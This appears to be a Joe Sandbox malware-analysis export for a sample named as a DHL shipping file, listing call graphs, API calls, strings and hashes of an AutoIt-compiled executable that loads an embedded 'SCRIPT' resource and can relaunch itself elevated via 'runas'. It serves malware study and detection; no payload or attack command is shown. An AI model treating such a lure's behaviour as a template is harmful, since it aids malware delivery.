b641fd 98760->98761 98762 b64220 ExitProcess 98761->98762 98762->98755 98769 b65120 GetPEB 98763->98769 98765 b6231b 98765->98751 98767 b63f39 Sleep 98766->98767 98768 b63f47 98767->98768 98770 b6514a 98769->98770 98770->98765 98771 82105b 98776 82344d 98771->98776 98773 82106a 98807 8400a3 29 API calls __onexit 98773->98807 98775 821074 98777 82345d __wsopen_s 98776->98777 98778 82a961 22 API calls 98777->98778 98779 823513 98778->98779 98780 823a5a 24 API calls 98779->98780 98781 82351c 98780->98781 98808 823357 98781->98808 98784 8233c6 22 API calls 98785 823535 98784->98785 98786 82515f 22 API calls 98785->98786 98787 823544 98786->98787 98788 82a961 22 API calls 98787->98788 98789 82354d 98788->98789 98790 82a6c3 22 API calls 98789->98790 98791 823556 RegOpenKeyExW 98790->98791 98792 863176 RegQueryValueExW 98791->98792 98796 823578 98791->98796 98793 863193 98792->98793 98794 86320c RegCloseKey 98792->98794 98795 83fe0b 22 API calls 98793->98795 98794->98796 98806 86321e _wcslen 98794->98806 98797 8631ac 98795->98797 98796->98773 98798 825722 22 API calls 98797->98798 98799 8631b7 RegQueryValueExW 98798->98799 98800 8631d4 98799->98800 98803 8631ee ISource 98799->98803 98801 826b57 22 API calls 98800->98801 98801->98803 98802 824c6d 22 API calls 98802->98806 98803->98794 98804 829cb3 22 API calls 98804->98806 98805 82515f 22 API calls 98805->98806 98806->98796 98806->98802 98806->98804 98806->98805 98807->98775 98809 861f50 __wsopen_s 98808->98809 98810 823364 GetFullPathNameW 98809->98810 98811 823386 98810->98811 98812 826b57 22 API calls 98811->98812 98813 8233a4 98812->98813 98813->98784 98814 821098 98819 8242de 98814->98819 98818 8210a7 98820 82a961 22 API calls 98819->98820 98821 8242f5 GetVersionExW 98820->98821 98822 826b57 22 API calls 98821->98822 98823 824342 98822->98823 98824 8293b2 22 API calls 98823->98824 98836 824378 98823->98836 98825 82436c 98824->98825 98827 8237a0 22 API calls 98825->98827 98826 82441b GetCurrentProcess IsWow64Process 98828 824437 98826->98828 98827->98836 98829 863824 GetSystemInfo 98828->98829 98830 82444f LoadLibraryA 98828->98830 98831 824460 GetProcAddress 98830->98831 98832 82449c GetSystemInfo 98830->98832 98831->98832 98834 824470 GetNativeSystemInfo 98831->98834 98835 824476 98832->98835 98833 8637df 98834->98835 98837 82109d 98835->98837 98838 82447a FreeLibrary 98835->98838 98836->98826 98836->98833 98839 8400a3 29 API calls __onexit 98837->98839 98838->98837 98839->98818 98840 82f7bf 98841 82f7d3 98840->98841 98842 82fcb6 98840->98842 98844 82fcc2 98841->98844 98845 83fddb 22 API calls 98841->98845 98843 82aceb 23 API calls 98842->98843 98843->98844 98846 82aceb 23 API calls 98844->98846 98847 82f7e5 98845->98847 98849 82fd3d 98846->98849 98847->98844 98848 82f83e 98847->98848 98847->98849 98851 831310 235 API calls 98848->98851 98867 82ed9d ISource 98848->98867 98877 891155 22 API calls 98849->98877 98873 82ec76 ISource 98851->98873 98852 83fddb 22 API calls 98852->98873 98853 82fef7 98859 82a8c7 22 API calls 98853->98859 98853->98867 98856 874600 98862 82a8c7 22 API calls 98856->98862 98856->98867 98857 874b0b 98879 89359c 82 API calls __wsopen_s 98857->98879 98858 82a8c7 22 API calls 98858->98873 98859->98867 98862->98867 98864 840242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98864->98873 98865 82fbe3 98865->98867 98868 874bdc 98865->98868 98874 82f3ae ISource 98865->98874 98866 82a961 22 API calls 98866->98873 98880 89359c 82 API calls __wsopen_s 98868->98880 98870 874beb 98881 89359c 82 API calls __wsopen_s 98870->98881 98871 8401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98871->98873 98872 8400a3 29 API calls pre_c_initialization 98872->98873 98873->98852 98873->98853 98873->98856 98873->98857 98873->98858 98873->98864 98873->98865 98873->98866 98873->98867 98873->98870 98873->98871 98873->98872 98873->98874 98875 8301e0 235 API calls 2 library calls 98873->98875 98876 8306a0 41 API calls ISource 98873->98876 98874->98867 98878 89359c 82 API calls __wsopen_s 98874->98878 98875->98873 98876->98873 98877->98867 98878->98867 98879->98867 98880->98870 98881->98867 98882 8403fb 98883 840407 CallCatchBlock 98882->98883 98911 83feb1 98883->98911 98885 84040e 98886 840561 98885->98886 98889 840438 98885->98889 98938 84083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 98886->98938 98888 840568 98939 844e52 28 API calls _abort 98888->98939 98899 840477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98889->98899 98922 85247d 98889->98922 98891 84056e 98940 844e04 28 API calls _abort 98891->98940 98895 840576 98896 840457 98898 8404d8 98930 840959 98898->98930 98899->98898 98934 844e1a 38 API calls 2 library calls 98899->98934 98902 8404de 98903 8404f3 98902->98903 98935 840992 GetModuleHandleW 98903->98935 98905 8404fa 98905->98888 98906 8404fe 98905->98906 98907 840507 98906->98907 98936 844df5 28 API calls _abort 98906->98936 98937 840040 13 API calls 2 library calls 98907->98937 98910 84050f 98910->98896 98912 83feba 98911->98912 98941 840698 IsProcessorFeaturePresent 98912->98941 98914 83fec6 98942 842c94 10 API calls 3 library calls 98914->98942 98916 83fecb 98917 83fecf 98916->98917 98943 852317 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 98916->98943 98917->98885 98919 83fed8 98920 83fee6 98919->98920 98944 842cbd 8 API calls 3 library calls 98919->98944 98920->98885 98923 852494 98922->98923 98924 840a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98923->98924 98925 840451 98924->98925 98925->98896 98926 852421 98925->98926 98927 852450 98926->98927 98928 840a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98927->98928 98929 852479 98928->98929 98929->98899 98945 842340 98930->98945 98933 84097f 98933->98902 98934->98898 98935->98905 98936->98907 98937->98910 98938->98888 98939->98891 98940->98895 98941->98914 98942->98916 98943->98919 98944->98917 98946 84096c GetStartupInfoW 98945->98946 98946->98933

                                                                                            Executed Functions

                                                                                            Function 008242DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 234 8242de-82434d call 82a961 GetVersionExW call 826b57 239 863617-86362a 234->239 240 824353 234->240 242 86362b-86362f 239->242 241 824355-824357 240->241 243 863656 241->243 244 82435d-8243bc call 8293b2 call 8237a0 241->244 245 863632-86363e 242->245 246 863631 242->246 249 86365d-863660 243->249 263 8243c2-8243c4 244->263 264 8637df-8637e6 244->264 245->242 248 863640-863642 245->248 246->245 248->241 251 863648-86364f 248->251 253 863666-8636a8 249->253 254 82441b-824435 GetCurrentProcess IsWow64Process 249->254 251->239 252 863651 251->252 252->243 253->254 258 8636ae-8636b1 253->258 256 824437 254->256 257 824494-82449a 254->257 260 82443d-824449 256->260 257->260 261 8636b3-8636bd 258->261 262 8636db-8636e5 258->262 265 863824-863828 GetSystemInfo 260->265 266 82444f-82445e LoadLibraryA 260->266 267 8636bf-8636c5 261->267 268 8636ca-8636d6 261->268 270 8636e7-8636f3 262->270 271 8636f8-863702 262->271 263->249 269 8243ca-8243dd 263->269 272 863806-863809 264->272 273 8637e8 264->273 276 824460-82446e GetProcAddress 266->276 277 82449c-8244a6 GetSystemInfo 266->277 267->254 268->254 278 863726-86372f 269->278 279 8243e3-8243e5 269->279 270->254 281 863704-863710 271->281 282 863715-863721 271->282 274 8637f4-8637fc 272->274 275 86380b-86381a 272->275 280 8637ee 273->280 274->272 275->280 285 86381c-863822 275->285 276->277 286 824470-824474 GetNativeSystemInfo 276->286 287 824476-824478 277->287 283 863731-863737 278->283 284 86373c-863748 278->284 288 8243eb-8243ee 279->288 289 86374d-863762 279->289 280->274 281->254 282->254 283->254 284->254 285->274 286->287 292 824481-824493 287->292 293 82447a-82447b FreeLibrary 287->293 294 8243f4-82440f 288->294 295 863791-863794 288->295 290 863764-86376a 289->290 291 86376f-86377b 289->291 290->254 291->254 293->292 297 863780-86378c 294->297 298 824415 294->298 295->254 296 86379a-8637c1 295->296 299 8637c3-8637c9 296->299 300 8637ce-8637da 296->300 297->254 298->254 299->254 300->254
                                                                                            APIs
                                                                                            • GetVersionExW.KERNEL32(?), ref: 0082430D
                                                                                              • Part of subcall function 00826B57: _wcslen.LIBCMT ref: 00826B6A
                                                                                            • GetCurrentProcess.KERNEL32(?,008BCB64,00000000,?,?), ref: 00824422
                                                                                            • IsWow64Process.KERNEL32(00000000,?,?), ref: 00824429
                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00824454
                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00824466
                                                                                            • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00824474
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 0082447B
                                                                                            • GetSystemInfo.KERNEL32(?,?,?), ref: 008244A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                            • API String ID: 3290436268-3101561225
                                                                                            • Opcode ID: 9b2a3f859c2f214b279cd040f01edc874c6b4b3c93779191e1fd6bbf9bfe7125
                                                                                            • Instruction ID: 6620439c469568b439c75b4d7b1f4b0282fbb83ed60b3ddd0331295b852431c7
                                                                                            • Opcode Fuzzy Hash: 9b2a3f859c2f214b279cd040f01edc874c6b4b3c93779191e1fd6bbf9bfe7125
                                                                                            • Instruction Fuzzy Hash: 3CA1D36690A2D4CFCF12D77DBC499B67FE4FB36304B0858A9D081D3B22D2284548CB25
                                                                                            Function 008242A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 553 8242a2-8242ba CreateStreamOnHGlobal 554 8242da-8242dd 553->554 555 8242bc-8242d3 FindResourceExW 553->555 556 8242d9 555->556 557 8635ba-8635c9 LoadResource 555->557 556->554 557->556 558 8635cf-8635dd SizeofResource 557->558 558->556 559 8635e3-8635ee LockResource 558->559 559->556 560 8635f4-863612 559->560 560->556
                                                                                            APIs
                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,008250AA,?,?,00000000,00000000), ref: 008242B2
                                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008250AA,?,?,00000000,00000000), ref: 008242C9
                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,008250AA,?,?,00000000,00000000,?,?,?,?,?,?,00824F20), ref: 008635BE
                                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,008250AA,?,?,00000000,00000000,?,?,?,?,?,?,00824F20), ref: 008635D3
                                                                                            • LockResource.KERNEL32(008250AA,?,?,008250AA,?,?,00000000,00000000,?,?,?,?,?,?,00824F20,?), ref: 008635E6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                            • String ID: SCRIPT
                                                                                            • API String ID: 3051347437-3967369404
                                                                                            • Opcode ID: e1431972354002e484e454b0b6e6ecb89822238ef1ccb7ec2f36d45b513fbda9
                                                                                            • Instruction ID: f1158c7458b1f8d5593d6deac3ac52fbd1b3430076c008452163a4fa26abbc11
                                                                                            • Opcode Fuzzy Hash: e1431972354002e484e454b0b6e6ecb89822238ef1ccb7ec2f36d45b513fbda9
                                                                                            • Instruction Fuzzy Hash: 36117C70240701FFDB218B66EC48F677BBAFBC5B51F104269B412D6250DBB2DC408630
                                                                                            Function 00862BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00822B6B
                                                                                              • Part of subcall function 00823A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008F1418,?,00822E7F,?,?,?,00000000), ref: 00823A78
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                            • GetForegroundWindow.USER32(runas,?,?,?,?,?,008E2224), ref: 00862C10
                                                                                            • ShellExecuteW.SHELL32(00000000,?,?,008E2224), ref: 00862C17
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                            • String ID: runas
                                                                                            • API String ID: 448630720-4000483414
                                                                                            • Opcode ID: 4b65a632058d96f03bd0e14423e055e12fdd152aea58bf304bf386abe7c115fc
                                                                                            • Instruction ID: 1ba7dddadfd88595670ab0137debb311553ac907de8327c6454b20e05454c5c2
                                                                                            • Opcode Fuzzy Hash: 4b65a632058d96f03bd0e14423e055e12fdd152aea58bf304bf386abe7c115fc
                                                                                            • Instruction Fuzzy Hash: 0211E731104365EAC704FF78F8659BE7BA5FBA5310F44042DF182D21A2CF258689C753
                                                                                            Function 0088DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,00865222), ref: 0088DBCE
                                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 0088DBDD
                                                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 0088DBEE
                                                                                            • FindClose.KERNEL32(00000000), ref: 0088DBFA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2695905019-0
                                                                                            • Opcode ID: d3fd48753d0ad175a363b3f9d9ffa7b476a610ecc70b906b2e50862a0e336b7d
                                                                                            • Instruction ID: 3373502db5046b004fafc9f4fda3eb0c367d4649093aa582f5fd1a9eb959b1ea
                                                                                            • Opcode Fuzzy Hash: d3fd48753d0ad175a363b3f9d9ffa7b476a610ecc70b906b2e50862a0e336b7d
                                                                                            • Instruction Fuzzy Hash: 7BF06531814A14578220BB7CAD0D8AA776DFF41335B544706F876D22F0EBB05D55C7D5
                                                                                            Function 0082D730 Relevance: 21.6, APIs: 14, Instructions: 618windowsleeptimeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetInputState.USER32 ref: 0082D807
                                                                                            • timeGetTime.WINMM ref: 0082DA07
                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0082DB28
                                                                                            • TranslateMessage.USER32(?), ref: 0082DB7B
                                                                                            • DispatchMessageW.USER32(?), ref: 0082DB89
                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0082DB9F
                                                                                            • Sleep.KERNEL32(0000000A), ref: 0082DBB1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                            • String ID:
                                                                                            • API String ID: 2189390790-0
                                                                                            • Opcode ID: b2a64956e1d64ed618b4161f3db18c7cbaf323c738fadc8d33634038b8e97bc0
                                                                                            • Instruction ID: b5daea1bb536b69c069c85b9481cc6ec3f4b2793f21122b5e68994ecdf7907e6
                                                                                            • Opcode Fuzzy Hash: b2a64956e1d64ed618b4161f3db18c7cbaf323c738fadc8d33634038b8e97bc0
                                                                                            • Instruction Fuzzy Hash: 5642BF70608355DFDB25CB28D858FAABBE0FF85314F148659F49AC7291D770E884CB92
                                                                                            Function 00822CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00822D07
                                                                                            • RegisterClassExW.USER32(00000030), ref: 00822D31
                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00822D42
                                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00822D5F
                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00822D6F
                                                                                            • LoadIconW.USER32(000000A9), ref: 00822D85
                                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00822D94
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                            • API String ID: 2914291525-1005189915
                                                                                            • Opcode ID: ed0eaa7039de4a5a4b80a906f7bf2ffd7942d1d9305c984ad0d30f70ab7d7687
                                                                                            • Instruction ID: c72852e267be9722d8993afdbd51b3ca378013826157509554c4db8a1ec42a5d
                                                                                            • Opcode Fuzzy Hash: ed0eaa7039de4a5a4b80a906f7bf2ffd7942d1d9305c984ad0d30f70ab7d7687
                                                                                            • Instruction Fuzzy Hash: FB21C3B5A51218EFDF00DFA4E889BEDBFB4FB08700F10821AF651A62A0D7B54545CF95
                                                                                            Function 0086065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 302 86065b-86068b call 86042f 305 8606a6-8606b2 call 855221 302->305 306 86068d-860698 call 84f2c6 302->306 312 8606b4-8606c9 call 84f2c6 call 84f2d9 305->312 313 8606cb-860714 call 86039a 305->313 311 86069a-8606a1 call 84f2d9 306->311 320 86097d-860983 311->320 312->311 322 860716-86071f 313->322 323 860781-86078a GetFileType 313->323 324 860756-86077c GetLastError call 84f2a3 322->324 325 860721-860725 322->325 326 8607d3-8607d6 323->326 327 86078c-8607bd GetLastError call 84f2a3 CloseHandle 323->327 324->311 325->324 329 860727-860754 call 86039a 325->329 332 8607df-8607e5 326->332 333 8607d8-8607dd 326->333 327->311 341 8607c3-8607ce call 84f2d9 327->341 329->323 329->324 334 8607e9-860837 call 85516a 332->334 335 8607e7 332->335 333->334 344 860847-86086b call 86014d 334->344 345 860839-860845 call 8605ab 334->345 335->334 341->311 352 86087e-8608c1 344->352 353 86086d 344->353 345->344 351 86086f-860879 call 8586ae 345->351 351->320 354 8608e2-8608f0 352->354 355 8608c3-8608c7 352->355 353->351 358 8608f6-8608fa 354->358 359 86097b 354->359 355->354 357 8608c9-8608dd 355->357 357->354 358->359 361 8608fc-86092f CloseHandle call 86039a 358->361 359->320 364 860963-860977 361->364 365 860931-86095d GetLastError call 84f2a3 call 855333 361->365 364->359 365->364
                                                                                            APIs
                                                                                              • Part of subcall function 0086039A: CreateFileW.KERNELBASE(00000000,00000000,?,00860704,?,?,00000000,?,00860704,00000000,0000000C), ref: 008603B7
                                                                                            • GetLastError.KERNEL32 ref: 0086076F
                                                                                            • __dosmaperr.LIBCMT ref: 00860776
                                                                                            • GetFileType.KERNELBASE(00000000), ref: 00860782
                                                                                            • GetLastError.KERNEL32 ref: 0086078C
                                                                                            • __dosmaperr.LIBCMT ref: 00860795
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008607B5
                                                                                            • CloseHandle.KERNEL32(?), ref: 008608FF
                                                                                            • GetLastError.KERNEL32 ref: 00860931
                                                                                            • __dosmaperr.LIBCMT ref: 00860938
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                            • String ID: H
                                                                                            • API String ID: 4237864984-2852464175
                                                                                            • Opcode ID: 95eb76e747f68630acf7f1690be6d65eca18fa84f74717c620a64b46480d6f97
                                                                                            • Instruction ID: 61f428b5451ac430654690734f609ab88f273bcc7ab2c4caf87ee47d67347db6
                                                                                            • Opcode Fuzzy Hash: 95eb76e747f68630acf7f1690be6d65eca18fa84f74717c620a64b46480d6f97
                                                                                            • Instruction Fuzzy Hash: BEA10132A142188FDF19AF68D851BAE7BA0FB06324F15015DF815EB3D2DB319912CF96
                                                                                            Function 0082344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 00823A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008F1418,?,00822E7F,?,?,?,00000000), ref: 00823A78
                                                                                              • Part of subcall function 00823357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00823379
                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0082356A
                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0086318D
                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 008631CE
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00863210
                                                                                            • _wcslen.LIBCMT ref: 00863277
                                                                                            • _wcslen.LIBCMT ref: 00863286
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                            • API String ID: 98802146-2727554177
                                                                                            • Opcode ID: c4a3358858ad6e62dac9d5f700028c792ca1f2ac212d380c26fde4b4f6f9f493
                                                                                            • Instruction ID: 223638152e5fbd8b9323ac226d0534c0713903f44a28e9409a48c2f0fb04909d
                                                                                            • Opcode Fuzzy Hash: c4a3358858ad6e62dac9d5f700028c792ca1f2ac212d380c26fde4b4f6f9f493
                                                                                            • Instruction Fuzzy Hash: 8F7149B14043159EC314EF69EC91DABBBE8FF95740F40092EF585C6271EB349A88CB62
                                                                                            Function 00822B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00822B8E
                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00822B9D
                                                                                            • LoadIconW.USER32(00000063), ref: 00822BB3
                                                                                            • LoadIconW.USER32(000000A4), ref: 00822BC5
                                                                                            • LoadIconW.USER32(000000A2), ref: 00822BD7
                                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00822BEF
                                                                                            • RegisterClassExW.USER32(?), ref: 00822C40
                                                                                              • Part of subcall function 00822CD4: GetSysColorBrush.USER32(0000000F), ref: 00822D07
                                                                                              • Part of subcall function 00822CD4: RegisterClassExW.USER32(00000030), ref: 00822D31
